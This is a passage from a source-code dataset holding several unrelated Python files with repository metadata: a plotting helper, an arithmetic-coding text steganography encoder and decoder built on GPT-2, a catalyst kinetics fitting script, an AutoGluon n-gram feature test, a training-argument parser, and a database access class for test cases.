file_name2 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "." + \
file_name.split(".")[-1]
fig2.savefig(os.path.join(data_dir, "output", file_name2), dpi=600)
plt.close('all')
def plot_fit_functions(data_dir, s_a_s=None, n_2_o_idx=None):
"""
plot selected fit functions
"""
u_norm = mu.read_uncertainty(os.path.join(data_dir, "output", "uncertainties_const.csv"),
os.path.join(data_dir, "output", "k_global.csv"))
target_sample = mu.read_target(os.path.join(
data_dir, "output", "ign_global.csv"))
_, zero_order_coef, first_order_coef, second_order_coef = prc.parse_regression_coef_c.get_var_zero_first_second_coef(
data_dir, s_a_s=s_a_s)
for idx in range(int(s_a_s['N_variable'])):
plot_1D_c(data_dir, u_norm, target_sample,
first_order_coef, zero_order_coef, idx,
n_2_o_idx=n_2_o_idx)
idx_pair_idx = flsr.fit_1D_2D_all_c.get_idx_pair_idx(s_a_s['N_variable'])
for i in range(int(s_a_s['N_variable'])):
for j in range(i + 1, int(s_a_s['N_variable'])):
plot_2D_c(data_dir, u_norm, target_sample,
second_order_coef, idx_pair_idx, [i, j],
n_2_o_idx=n_2_o_idx)
plot_1D_2D_c(data_dir, u_norm, target_sample,
zero_order_coef, first_order_coef, second_order_coef,
idx_pair_idx, index=[i, j],
n_2_o_idx=n_2_o_idx)
avg_line_length: 41.751534 | max_line_length: 139 | alphanum_fraction: 0.590772
hexsha: 634eaba4f5313c1ce33ea16052f9db218c47de0a | size: 13,634 | ext: py | lang: Python
max_stars: path NeuralSteganography-master1/saac.py | repo slatdude/TextSteganography | head c17e7ec76ea9bb6fe355c64d740942df616799bd | licenses ["MIT"] | count 5 | events 2021-03-01T12:42:26.000Z to 2022-02-23T11:49:39.000Z
max_issues: path NeuralSteganography-master1/saac.py | repo slatdude/TextSteganography | head c17e7ec76ea9bb6fe355c64d740942df616799bd | licenses ["MIT"] | count null | events null
max_forks: path NeuralSteganography-master1/saac.py | repo slatdude/TextSteganography | head c17e7ec76ea9bb6fe355c64d740942df616799bd | licenses ["MIT"] | count 2 | events 2021-03-01T12:22:32.000Z to 2021-05-22T08:21:00.000Z
content:
import torch
import torch.nn.functional as F
import numpy as np
from utils import limit_past, kl, entropy, bits2int, int2bits, is_sent_finish, num_same_from_beg
def encode_saac(model, enc, message, context, finish_sent=False, device='cuda', temp=1.0, precision=16, topk=50000, nucleus=0.95, verbose=False, with_case_study=False):
# print(f"message: {message}")
context = torch.tensor(context[-1022:], device=device, dtype=torch.long)
max_val = 2**precision
threshold = 2**(-precision)
cur_interval = [0, max_val] # bottom inclusive, top exclusive
prev = context
output = context
past = None
total_num = 0
total_num_for_stats = 0
total_log_probs = 0
total_kl = 0 # in bits
total_entropy_ptau = 0
topk_list = [] # save each step's selected topk
case_studies = [] # save each step's case study
max_step = 256
step_cnt = 0
with torch.no_grad():
i = 0
sent_finish = False
while i < len(message) or (finish_sent and not sent_finish):
step_cnt += 1
if verbose:
print(f"i: {i}")
print(f"cur_interval: {cur_interval}")
if step_cnt % 100 == 0:
print(f"Encode {step_cnt} steps")
logits, past = model(prev.unsqueeze(0), past=past)
past = limit_past(past)
logits[0, -1, -1] = -1e20 # endoftext token can't happen
logits[0, -1, 628] = -1e20 # 2 newlines token can't happen
logits, indices = logits[0, -1, :].sort(descending=True)
logits = logits.double()
logits_temp = logits / temp
probs_temp = F.softmax(logits_temp, dim=0)
log_probs_temp = F.log_softmax(logits_temp, dim=0)
log_probs = F.log_softmax(logits, dim=0)
# self-adjusting topk
cum_probs_temp = probs_temp.cumsum(0)
tmp = (cum_probs_temp >= nucleus).nonzero() # cannot be empty because nucleus<1
adaptive_topk = tmp[0].item()
# conditions for having reached the end of the message
if i >= len(message):
selection = 0
sent_finish = is_sent_finish(indices[selection].item(), enc)
else:
# Cutoff low probabilities that would be rounded to 0
cur_int_range = cur_interval[1]-cur_interval[0]
cur_threshold = 1/cur_int_range
tmp = (probs_temp < cur_threshold).nonzero()
if len(tmp) == 0:
k = max(topk, adaptive_topk)
else:
k = min(max(2, tmp[0].item()), max(topk, adaptive_topk))
probs_temp_int = probs_temp[:k] # Cutoff all but top k
topk_list.append(k)
# Rescale to correct range
probs_temp_int = probs_temp_int/probs_temp_int.sum()*cur_int_range
# Round probabilities to integers given precision
probs_temp_int = probs_temp_int.round().long()
cum_probs = probs_temp_int.cumsum(0)
# Remove any elements from the bottom if rounding caused the total prob to be too large
overfill_index = (cum_probs > cur_int_range).nonzero()
if len(overfill_index) > 0:
cum_probs = cum_probs[:overfill_index[0]]
# Add any mass to the top if removing/rounding causes the total prob to be too small
cum_probs[-1] += (cur_int_range-cum_probs[-1])
# Get out resulting probabilities
probs_final = cum_probs.clone()
probs_final[1:] = cum_probs[1:] - cum_probs[:-1]
# Convert to position in range
cum_probs += cur_interval[0]
# Get selected index based on binary fraction from message bits
message_bits = message[i:i+precision]
if i+precision > len(message):
message_bits = message_bits + [0]*(i+precision-len(message))
message_idx = bits2int(reversed(message_bits))
selection = (cum_probs > message_idx).nonzero()[0].item()
# Calculate new range as ints
new_int_bottom = cum_probs[selection-1] if selection > 0 else cur_interval[0]
new_int_top = cum_probs[selection]
# Convert range to bits
new_int_bottom_bits_inc = list(reversed(int2bits(new_int_bottom, precision)))
new_int_top_bits_inc = list(reversed(int2bits(new_int_top-1, precision))) # -1 here because upper bound is exclusive
# Consume most significant bits which are now fixed and update interval
num_bits_encoded = num_same_from_beg(new_int_bottom_bits_inc, new_int_top_bits_inc)
i += num_bits_encoded
new_int_bottom_bits = new_int_bottom_bits_inc[num_bits_encoded:] + [0]*num_bits_encoded
new_int_top_bits = new_int_top_bits_inc[num_bits_encoded:] + [1]*num_bits_encoded
cur_interval[0] = bits2int(reversed(new_int_bottom_bits))
cur_interval[1] = bits2int(reversed(new_int_top_bits))+1 # +1 here because upper bound is exclusive
# Gather statistics
total_log_probs += log_probs[selection].item()
q = probs_final.double()/probs_final.sum()
logq = q.log()
cur_kl = kl(q, logq, log_probs[:len(q)])
total_kl += cur_kl
total_entropy_ptau += entropy(probs_temp, log_probs_temp)
total_num_for_stats += 1
# Update history with new token
prev = indices[selection].view(1)
output = torch.cat((output, prev))
total_num += 1
#print(enc.decode(prev.tolist()), message_bits[:num_bits_encoded])
# temp_express = enc.decode(prev)
# For text->bits->text
partial = enc.decode(output[len(context):].tolist())
if '<eos>' in partial:
break
if with_case_study:
case_studies.append([step_cnt, k, cur_kl, partial])
# corners force to stop
if step_cnt >= max_step:
print("WARNING: reach maximum decoding steps")
break
avg_NLL = -total_log_probs/total_num_for_stats
avg_KL = total_kl/total_num_for_stats
avg_Hq = total_entropy_ptau/total_num_for_stats
words_per_bit = total_num_for_stats/i
return output[len(context):].tolist(), avg_NLL, avg_KL, words_per_bit, avg_Hq, topk_list, case_studies
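# Editor's note: the interval bookkeeping above is standard arithmetic coding.
# With precision=16 the interval starts as [0, 65536); after each token is
# chosen, the most-significant bits shared by the new bottom and top are
# exactly the message bits consumed, and the interval is re-expanded by
# shifting those bits out (bottom refilled with 0s, top with 1s).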
def decode_saac(model, enc, text, context, device='cuda', temp=1.0, precision=16, topk=50000, nucleus=0.95):
# inp is a list of token indices
# context is a list of token indices
inp = enc.encode(text)
# common BPE error case: 198, 198 (2 newlines) is interpreted as 628 (2 newlines)
i = 0
while i < len(inp):
if inp[i] == 628:
inp[i] = 198
inp[i+1:i+1] = [198]
i += 2
else:
i += 1
context = torch.tensor(context[-1022:], device=device, dtype=torch.long)
max_val = 2**precision
threshold = 2**(-precision)
cur_interval = [0, max_val] # bottom inclusive, top exclusive
prev = context
past = None
message = []
with torch.no_grad():
i = 0
while i < len(inp):
logits, past = model(prev.unsqueeze(0), past=past) # logits of size (1, sequence_length, hidden_size),
past = limit_past(past)
logits[0, -1, -1] = -1e20 # endoftext can't happen
logits[0, -1, 628] = -1e20 # 2 newlines can't happen
logits, indices = logits[0, -1, :].sort(descending=True)
logits = logits.double()
logits_temp = logits / temp
probs_temp = F.softmax(logits_temp, dim=0)
# self-adjusting topk
cum_probs_temp = probs_temp.cumsum(0)
tmp = (cum_probs_temp >= nucleus).nonzero()
adaptive_topk = tmp[0].item()
# Cutoff low probabilities that would be rounded to 0
cur_int_range = cur_interval[1]-cur_interval[0]
cur_threshold = 1/cur_int_range
tmp = (probs_temp < cur_threshold).nonzero()
if len(tmp) == 0:
k = max(topk, adaptive_topk)
else:
k = min(max(2, tmp[0].item()), max(topk, adaptive_topk))
probs_temp_int = probs_temp[:k] # Cutoff all but top k
# Rescale to correct range
probs_temp_int = probs_temp_int/probs_temp_int.sum()*cur_int_range
# Round probabilities to integers given precision
probs_temp_int = probs_temp_int.round().long()
cum_probs = probs_temp_int.cumsum(0)
# Remove any elements from the bottom if rounding caused the total prob to be too large
overfill_index = (cum_probs > cur_int_range).nonzero()
if len(overfill_index) > 0:
cum_probs = cum_probs[:overfill_index[0]]
k = overfill_index[0].item()
# Add any mass to the top if removing/rounding causes the total prob to be too small
cum_probs[-1] += cur_int_range-cum_probs[-1]
# Convert to position in range
cum_probs += cur_interval[0]
### This is where we find the range of i-th subword ###
rank = (indices == inp[i]).nonzero().item()
# Handle most errors that could happen because of BPE with heuristic
if rank >= k:
true_token_text = enc.decoder[inp[i]]
for rank_idx in range(k):
prop_token_text = enc.decoder[indices[rank_idx].item()]
# common case that is not caught
if inp[i] == 128 and indices[rank_idx] == 198:
rank = rank_idx
inp[i] = indices[rank_idx].item()
break
# Is there a more likely prefix token that could be the actual token generated?
if len(prop_token_text) <= len(true_token_text) and \
prop_token_text == true_token_text[:len(prop_token_text)]:
rank = rank_idx
suffix = true_token_text[len(prop_token_text):]
suffix_tokens = enc.encode(suffix) # a list
inp[i] = indices[rank_idx].item()
inp[i+1:i+1] = suffix_tokens # insert suffix tokens into list
break
# Is there a more likely longer token that could be the actual token generated?
elif len(prop_token_text) > len(true_token_text) and \
true_token_text == prop_token_text[:len(true_token_text)]:
whole_text = true_token_text
num_extra = 1
while len(whole_text) < len(prop_token_text):
whole_text += enc.decoder[inp[i+num_extra]]
num_extra += 1
if prop_token_text == whole_text[:len(prop_token_text)]:
rank = rank_idx
inp[i] = indices[rank_idx].item()
for j in range(1, num_extra):
del inp[i+j]
if len(whole_text) > len(prop_token_text):
suffix = whole_text[len(prop_token_text):]
suffix_tokens = enc.encode(suffix) # a list
inp[i+1:i+1] = suffix_tokens # insert suffix tokens into list
break
else:
print('Unable to fix BPE error: token received: %s=%d, text: %s' % (true_token_text, inp[i], text))
rank = 0
selection = rank
# Calculate new range as ints
new_int_bottom = cum_probs[selection-1] if selection > 0 else cur_interval[0]
new_int_top = cum_probs[selection]
# Convert range to bits
new_int_bottom_bits_inc = list(reversed(int2bits(new_int_bottom, precision)))
new_int_top_bits_inc = list(reversed(int2bits(new_int_top-1, precision))) # -1 here because upper bound is exclusive
# Emit most significant bits which are now fixed and update interval
num_bits_encoded = num_same_from_beg(new_int_bottom_bits_inc, new_int_top_bits_inc)
if i == len(inp)-1:
new_bits = new_int_bottom_bits_inc
else:
new_bits = new_int_top_bits_inc[:num_bits_encoded]
message += new_bits
new_int_bottom_bits = new_int_bottom_bits_inc[num_bits_encoded:] + [0]*num_bits_encoded
new_int_top_bits = new_int_top_bits_inc[num_bits_encoded:] + [1]*num_bits_encoded
cur_interval[0] = bits2int(reversed(new_int_bottom_bits))
cur_interval[1] = bits2int(reversed(new_int_top_bits))+1 # +1 here because upper bound is exclusive
# Update history with new token
prev = torch.tensor([inp[i]], device=device, dtype=torch.long)
#print(enc.decode([inp[i]]), new_bits)
i += 1
return message
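# --- Illustrative round trip (editor's sketch; model, enc and context stand for
# the same GPT-2 style model, BPE encoder and token-id prefix used above): ---
#   out_ids, nll, kl, wpb, hq, topks, cases = encode_saac(model, enc, bits, context)
#   stego_text = enc.decode(out_ids)
#   recovered = decode_saac(model, enc, stego_text, context)
#   recovered[:len(bits)] == bits   # up to trailing padding bits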
avg_line_length: 44.701639 | max_line_length: 168 | alphanum_fraction: 0.564618
hexsha: 24970388fdb18d5eb50ade534b3a2c84375447d9 | size: 5,751 | ext: py | lang: Python
max_stars: path scripts/python/catalyst/updatedTWC/load_iso-octane.py | repo coelectrolyzer/cats | head 21f8e6f5f176767ec403ad2738c80a5a71fba959 | licenses ["MIT"] | count 1 | events 2022-02-17T16:37:12.000Z to 2022-02-17T16:37:12.000Z
max_issues: path scripts/python/catalyst/updatedTWC/load_iso-octane.py | repo coelectrolyzer/cats | head 21f8e6f5f176767ec403ad2738c80a5a71fba959 | licenses ["MIT"] | count 5 | events 2021-10-30T00:06:31.000Z to 2022-03-09T13:34:07.000Z
max_forks: path scripts/python/catalyst/updatedTWC/load_iso-octane.py | repo coelectrolyzer/cats | head 21f8e6f5f176767ec403ad2738c80a5a71fba959 | licenses ["MIT"] | count 3 | events 2021-05-08T02:26:08.000Z to 2022-03-01T22:27:40.000Z
content:
# This file is a demo for the 'Isothermal_Monolith_Simulator' object
import sys
sys.path.append('../..')
from catalyst.isothermal_monolith_catalysis import *
# Give x, y, z for the HC (CxHyOz)
HC_name = "iso-octane"
run = "02"
oldrun="01"
readfile = 'output/'+HC_name+'_model'+oldrun+'.json'
writefile = HC_name+"_model"+run+".json"
sim = Isothermal_Monolith_Simulator()
sim.load_model_full(readfile, reset_param_bounds=True)
# CO + 0.5 O2 --> CO2
#"r1": ReactionType.Arrhenius,
# H2 + 0.5 O2 --> H2O
#"r2": ReactionType.Arrhenius,
# CO + NO --> CO2 (+ 0.5 N2)
#"r4": ReactionType.Arrhenius,
# CO + 2 NO --> CO2 + N2O
#"r5": ReactionType.Arrhenius,
# 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
#"r8": ReactionType.Arrhenius,
# CO + H2O <-- --> CO2 + H2
#"r11": ReactionType.EquilibriumArrhenius,
# 2.5 H2 + NO --> NH3 + H2O
#"r6": ReactionType.Arrhenius,
# H2 + NO --> H2O (+ 0.5 N2)
#"r7": ReactionType.Arrhenius,
# H2 + 2 NO --> N2O + H2O
#"r14": ReactionType.Arrhenius,
# NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
#"r15": ReactionType.Arrhenius,
# HC oxidation
# CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
#"r3": ReactionType.Arrhenius,
# HC Steam Reforming
# CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
#"r12": ReactionType.Arrhenius,
# HC NO reduction
# CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
#"r10": ReactionType.Arrhenius,
sim.fix_all_reactions()
# NOTE: If the rates are "inhibited", then we want the activation energies to increase
# CO/O2 (opt this first)
rxn = "r1"
#sim.unfix_reaction(rxn)
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
# CO/NO
rxn = "r4"
#sim.unfix_reaction("r4")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
rxn = "r5"
#sim.unfix_reaction("r5")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[multrxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
rxn = "r8"
#sim.unfix_reaction("r8")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
# H2/NO (Don't let these vary?)
#sim.unfix_reaction("r6")
#sim.unfix_reaction("r7")
#sim.unfix_reaction("r14")
# HC reactions
rxn = "r3"
sim.unfix_reaction("r3")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
rxn = "r10"
sim.unfix_reaction("r10")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
rxn = "r12"
sim.unfix_reaction("r12")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
# ========== Selecting weight factors
sim.auto_select_all_weight_factors()
sim.ignore_weight_factor("N2O","A0","T0",time_window=(0,110))
sim.ignore_weight_factor("CO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NO","A0","T0",time_window=(0,110))
# ignore this temporarily
#sim.ignore_weight_factor("NH3","A0","T0",time_window=(0,110))
#sim.set_weight_factor_multiplier("NH3", "A0", "T0", 0.5)
#sim.ignore_weight_factor("HC","A0","T0",time_window=(0,30))
#sim.ignore_weight_factor("HC","A0","T0",time_window=(50,110))
sim.finalize_auto_scaling()
# Stop at 39 iter if needed
#my_options={'max_iter': 39}
#sim.run_solver(options=my_options)
sim.run_solver()
name = HC_name+"_CO"
sim.plot_vs_data("CO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NO"
sim.plot_vs_data("NO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_HC"
sim.plot_vs_data("HC", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NH3"
sim.plot_vs_data("NH3", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_N2O"
sim.plot_vs_data("N2O", "A0", "T0", 5, display_live=False, file_name=name)
sim.plot_at_times(["CO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_CO-profile-out")
sim.plot_at_times(["O2"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_O2-profile-out")
sim.plot_at_times(["HC"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_HC-profile-out")
sim.plot_at_times(["NO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_NO-profile-out")
sim.plot_at_locations(["O2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_O2-out")
sim.plot_at_locations(["H2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_H2-out")
sim.print_results_of_breakthrough(["HC","CO","NO","NH3","N2O","H2","O2","H2O"],
"A0", "T0", file_name=HC_name+"_lightoff.txt", include_temp=True)
sim.print_results_of_integral_average(["CO","NO","HC"], "A0", "T0", file_name=HC_name+"_avgs-used-for-inhibition.txt")
sim.print_kinetic_parameter_info(file_name=HC_name+"_params"+run+".txt")
sim.save_model_state(file_name=writefile)
avg_line_length: 34.232143 | max_line_length: 118 | alphanum_fraction: 0.670666
hexsha: 4f99da330112201a5a8e091228d1419e2fe9fab8 | size: 1,482 | ext: py | lang: Python
max_stars: path tests/unittests/utils/tabular/features/generators/test_text_ngram.py | repo NunoEdgarGFlowHub/autogluon | head 714894698495ef4352706d3c4250823ad4a43ead | licenses ["Apache-2.0"] | count null | events null
max_issues: path tests/unittests/utils/tabular/features/generators/test_text_ngram.py | repo NunoEdgarGFlowHub/autogluon | head 714894698495ef4352706d3c4250823ad4a43ead | licenses ["Apache-2.0"] | count null | events null
max_forks: path tests/unittests/utils/tabular/features/generators/test_text_ngram.py | repo NunoEdgarGFlowHub/autogluon | head 714894698495ef4352706d3c4250823ad4a43ead | licenses ["Apache-2.0"] | count null | events null
content:
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from autogluon.utils.tabular.features.generators import TextNgramFeatureGenerator
def test_text_ngram_feature_generator(generator_helper, data_helper):
# Given
input_data = data_helper.generate_multi_feature_full()
toy_vectorizer = CountVectorizer(min_df=2, ngram_range=(1, 3), max_features=10, dtype=np.uint8)
# max_memory_ratio=None in test to avoid CI reducing ngrams non-deterministically.
generator = TextNgramFeatureGenerator(max_memory_ratio=None, vectorizer=toy_vectorizer)
expected_feature_metadata_in_full = {
('object', ('text',)): ['text'],
}
expected_feature_metadata_full = {('int', ('text_ngram',)): [
'__nlp__.breaks',
'__nlp__.end',
'__nlp__.end of',
'__nlp__.end of the',
'__nlp__.of',
'__nlp__.sentence',
'__nlp__.sentence breaks',
'__nlp__.the',
'__nlp__.the end',
'__nlp__.world',
'__nlp__._total_'
]}
expected_output_data_feat_total = [1, 3, 0, 0, 7, 1, 3, 7, 3]
# When
output_data = generator_helper.fit_transform_assert(
input_data=input_data,
generator=generator,
expected_feature_metadata_in_full=expected_feature_metadata_in_full,
expected_feature_metadata_full=expected_feature_metadata_full,
)
assert expected_output_data_feat_total == list(output_data['__nlp__._total_'].values)
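# Editor's note (illustrative): the toy CountVectorizer above keeps at most 10
# n-grams of length 1-3 that occur in at least 2 documents; the expected
# '__nlp__.*' columns are exactly those n-grams plus the '__nlp__._total_'
# per-row n-gram count that the final assert checks.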
avg_line_length: 32.933333 | max_line_length: 99 | alphanum_fraction: 0.703104
hexsha: 7234a37106ec1e3adbbe32fa33e16fc1c5d3aeaf | size: 1,093 | ext: py | lang: Python
max_stars: path src/python/utils/args_parsers.py | repo lvrcek/consensus-net | head 560957f315751822e1ddf8c097eb7b712ceadff3 | licenses ["MIT"] | count null | events null
max_issues: path src/python/utils/args_parsers.py | repo lvrcek/consensus-net | head 560957f315751822e1ddf8c097eb7b712ceadff3 | licenses ["MIT"] | count null | events null
max_forks: path src/python/utils/args_parsers.py | repo lvrcek/consensus-net | head 560957f315751822e1ddf8c097eb7b712ceadff3 | licenses ["MIT"] | count 1 | events 2018-12-23T13:50:29.000Z to 2018-12-23T13:50:29.000Z
content:
import argparse
def parse_train_args(args):
"""
Parses arguments for model training.
Arguments should be passed just like 'sys.argv[1:]'.
Needed arguments are X_train_path, y_train_path, X_validate_path,
y_validate_path and model_save_path.
:param args: list of args from sys.argv[1:]
:type args: list of str
:return: parsed arguments for training
:rtype: Namespace
"""
parser = argparse.ArgumentParser()
parser.add_argument('X_train', type=str, help='X_train path.')
parser.add_argument('y_train', type=str, help='y_train path.')
parser.add_argument('X_validate', type=str, help='X_validate path.')
parser.add_argument('y_validate', type=str, help='y_validate path.')
parser.add_argument('model_save_path', type=str,
help='Path for trained model saving.')
parser.add_argument('tensorboard_output_dir', type=str,
help='Path for Tensorboard output data.')
parser.add_argument('--class-weights', type=str, help='Class weights path.')
return parser.parse_args(args)
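# --- Illustrative usage (editor's sketch; the file paths are hypothetical) ---
#   args = parse_train_args(['X_train.npy', 'y_train.npy', 'X_val.npy',
#                            'y_val.npy', 'model.h5', './tb_logs',
#                            '--class-weights', 'weights.json'])
#   args.model_save_path   # -> 'model.h5'
#   args.class_weights     # -> 'weights.json' (None if the flag is omitted)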
avg_line_length: 36.433333 | max_line_length: 80 | alphanum_fraction: 0.686185
hexsha: 2aa05d507a13ea2276643dbf2ac90ea12fd03d10 | size: 14,748 | ext: py | lang: Python
max_stars: path app/crud/test_case/TestCaseDao.py | repo yst8493182/pity | head 7b2f6092dc0be2032e70b45a68b662426928e327 | licenses ["Apache-2.0"] | count null | events null
max_issues: path app/crud/test_case/TestCaseDao.py | repo yst8493182/pity | head 7b2f6092dc0be2032e70b45a68b662426928e327 | licenses ["Apache-2.0"] | count null | events null
max_forks: path app/crud/test_case/TestCaseDao.py | repo yst8493182/pity | head 7b2f6092dc0be2032e70b45a68b662426928e327 | licenses ["Apache-2.0"] | count null | events null
content:
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Dict
from sqlalchemy import desc, func, and_, asc
from sqlalchemy.future import select
from app.crud import Mapper
from app.crud.test_case.ConstructorDao import ConstructorDao
from app.crud.test_case.TestCaseAssertsDao import TestCaseAssertsDao
from app.crud.test_case.TestCaseDirectory import PityTestcaseDirectoryDao
from app.crud.test_case.TestcaseDataDao import PityTestcaseDataDao
from app.middleware.RedisManager import RedisHelper
from app.models import Session, DatabaseHelper, async_session
from app.models.constructor import Constructor
from app.models.schema.testcase_schema import TestCaseForm
from app.models.test_case import TestCase
from app.models.user import User
from app.utils.decorator import dao
from app.utils.logger import Log
from config import Config
@dao(TestCase, Log("TestCaseDao"))
class TestCaseDao(Mapper):
log = Log("TestCaseDao")
@classmethod
async def list_test_case(cls, directory_id: int = None, name: str = "", create_user: str = None):
try:
filters = [TestCase.deleted_at == 0]
if directory_id:
parents = await PityTestcaseDirectoryDao.get_directory_son(directory_id)
filters = [TestCase.deleted_at == 0, TestCase.directory_id.in_(parents)]
if name:
filters.append(TestCase.name.like(f"%{name}%"))
if create_user:
filters.append(TestCase.create_user == create_user)
async with async_session() as session:
sql = select(TestCase).where(*filters).order_by(TestCase.name.asc())
result = await session.execute(sql)
return result.scalars().all()
except Exception as e:
cls.log.error(f"获取测试用例失败: {str(e)}")
raise Exception(f"获取测试用例失败: {str(e)}")
@staticmethod
async def get_test_case_by_directory_id(directory_id: int):
try:
async with async_session() as session:
sql = select(TestCase).where(TestCase.deleted_at == 0,
TestCase.directory_id == directory_id).order_by(TestCase.name.asc())
result = await session.execute(sql)
ans = []
case_map = dict()
for item in result.scalars():
ans.append({"title": item.name, "key": "testcase_{}".format(item.id)})
case_map[item.id] = item.name
return ans, case_map
except Exception as e:
TestCaseDao.log.error(f"获取测试用例失败: {str(e)}")
raise Exception(f"获取测试用例失败: {str(e)}")
@staticmethod
def get_tree(case_list):
result = defaultdict(list)
# build the directory -> test case mapping
for cs in case_list:
result[cs.catalogue].append(cs)
keys = sorted(result.keys())
tree = [dict(key=f"cat_{key}",
children=[{"key": f"case_{child.id}", "title": child.name,
"total": TestCaseDao.get_case_children_length(child.id),
"children": TestCaseDao.get_case_children(child.id)} for child in result[key]],
title=key, total=len(result[key])) for key in keys]
return tree
@staticmethod
def get_case_children(case_id: int):
data, err = TestCaseAssertsDao.list_test_case_asserts(case_id)
if err:
raise err
return [dict(key=f"asserts_{d.id}", title=d.name, case_id=case_id) for d in data]
@staticmethod
def get_case_children_length(case_id: int):
data, err = TestCaseAssertsDao.list_test_case_asserts(case_id)
if err:
raise err
return len(data)
# @staticmethod
# def insert_test_case(test_case, user):
# """
#
# :param user: creator
# :param test_case: test case
# :return:
# """
# try:
# with Session() as session:
# data = session.query(TestCase).filter_by(name=test_case.get("name"),
# directory_id=test_case.get("directory_id"),
# deleted_at=0).first()
# if data is not None:
# raise Exception("用例已存在")
# cs = TestCase(**test_case, create_user=user)
# session.add(cs)
# session.commit()
# session.refresh(cs)
# return cs.id
# except Exception as e:
# TestCaseDao.log.error(f"添加用例失败: {str(e)}")
# raise Exception(f"添加用例失败: {str(e)}")
@staticmethod
def update_test_case(test_case: TestCaseForm, user):
"""
:param user: the user making the modification
:param test_case: the test case
:return:
"""
try:
with Session() as session:
data = session.query(TestCase).filter_by(id=test_case.id, deleted_at=0).first()
if data is None:
raise Exception("用例不存在")
DatabaseHelper.update_model(data, test_case, user)
session.commit()
session.refresh(data)
return data
except Exception as e:
TestCaseDao.log.error(f"编辑用例失败: {str(e)}")
raise Exception(f"编辑用例失败: {str(e)}")
@staticmethod
async def query_test_case(case_id: int) -> dict:
try:
async with async_session() as session:
sql = select(TestCase).where(TestCase.id == case_id, TestCase.deleted_at == 0)
result = await session.execute(sql)
data = result.scalars().first()
if data is None:
raise Exception("用例不存在")
# fetch the assertion section
asserts, _ = await TestCaseAssertsDao.async_list_test_case_asserts(data.id)
# fetch the data constructors
constructors = await ConstructorDao.list_constructor(case_id)
constructors_case = await TestCaseDao.query_test_case_by_constructors(constructors)
test_data = await PityTestcaseDataDao.list_testcase_data(case_id)
return dict(asserts=asserts, constructors=constructors, case=data, constructors_case=constructors_case,
test_data=test_data)
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
raise Exception(f"查询用例失败: {str(e)}")
@staticmethod
async def query_test_case_by_constructors(constructors: List[Constructor]):
try:
# collect the case ids referenced by test-case type constructors (type == 0)
constructors = [json.loads(x.constructor_json).get("case_id") for x in constructors if x.type == 0]
async with async_session() as session:
sql = select(TestCase).where(TestCase.id.in_(constructors), TestCase.deleted_at == 0)
result = await session.execute(sql)
data = result.scalars().all()
return {x.id: x for x in data}
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
raise Exception(f"查询用例失败: {str(e)}")
@staticmethod
async def async_query_test_case(case_id) -> [TestCase, str]:
try:
async with async_session() as session:
result = await session.execute(
select(TestCase).where(TestCase.id == case_id, TestCase.deleted_at == 0))
data = result.scalars().first()
if data is None:
return None, "用例不存在"
return data, None
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
return None, f"查询用例失败: {str(e)}"
@staticmethod
def list_testcase_tree(projects) -> [List, dict]:
try:
result = []
project_map = {}
project_index = {}
for p in projects:
project_map[p.id] = p.name
result.append({
"label": p.name,
"value": p.id,
"key": p.id,
"children": [],
})
project_index[p.id] = len(result) - 1
with Session() as session:
data = session.query(TestCase).filter(TestCase.project_id.in_(project_map.keys()),
TestCase.deleted_at == 0).all()
for d in data:
result[project_index[d.project_id]]["children"].append({
"label": d.name,
"value": d.id,
"key": d.id,
})
return result
except Exception as e:
TestCaseDao.log.error(f"获取用例列表失败: {str(e)}")
